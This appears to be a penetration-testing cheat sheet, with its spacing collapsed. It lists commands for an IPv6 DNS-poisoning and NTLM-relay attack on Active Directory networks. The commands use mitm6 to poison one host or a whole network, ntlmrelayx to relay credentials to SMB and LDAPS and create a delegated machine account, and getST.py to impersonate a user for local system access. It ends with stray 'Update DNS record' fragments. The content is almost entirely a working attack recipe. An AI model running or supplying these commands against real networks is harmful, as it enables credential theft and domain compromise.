# give yourself any ipv6 addressip-6addraddfe80::13:37/10dev<iface># poison single hostmitm6-hw<host>-d<domain>--ignore-nofqdn# poison whole networkmitm6-d<net># relay to smb in order to open a socks connectionntlmrelayx.py-6-wh<net>-tsmb://<ip>-l~/tmp/-socks-debug# relay to dlap in order to create a new machine account, which gives us local system on the poisoned boxntlmrelayx.py-tldaps://<dc>.<domain>-whattacker-wpad--delegate-access# impersonate user on overtaken machine accountgetST.py-spncifs/<originalcomputeracc>.<domain>/<newcomputeracc>-impersonate<user>
Update DNS record
Update DNS record to intercept traffic, capture hashes: